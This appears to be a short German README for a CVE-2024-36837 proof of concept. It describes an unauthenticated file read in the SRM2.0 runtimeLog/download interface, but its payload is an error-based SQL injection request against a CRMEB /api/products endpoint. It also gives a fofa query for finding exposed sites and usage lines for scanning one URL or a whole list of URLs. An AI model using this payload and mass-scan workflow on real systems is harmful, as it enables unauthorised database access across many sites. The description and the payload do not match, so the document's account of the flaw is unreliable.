
CVE-2024-36837 POC
#CVE-2024-36837
#智联云采 SRM2.0 runtimeLog/download Schnittstelle weist eine Schwachstelle für beliebiges Dateilesen auf. Nicht authentifizierte Angreifer können über diese Schwachstelle wichtige Systemdateien (z. B. Datenbankkonfigurationsdateien, Systemkonfigurationsdateien) lesen, was die Website in einen äußerst unsicheren Zustand versetzt.
fofa-Syntax: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
#POC:
GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #Fügen Sie vor der URL http:// oder https:// hinzu python 11.py
#Verwendung python cve.py -h
#Massenüberprüfung Die URL-Adresse in url.txt muss mit http:// oder https:// beginnen. python cve.py -f url.txt
#Einzelscan Die URL-Adresse muss mit http:// oder https:// beginnen. python cve.py -u url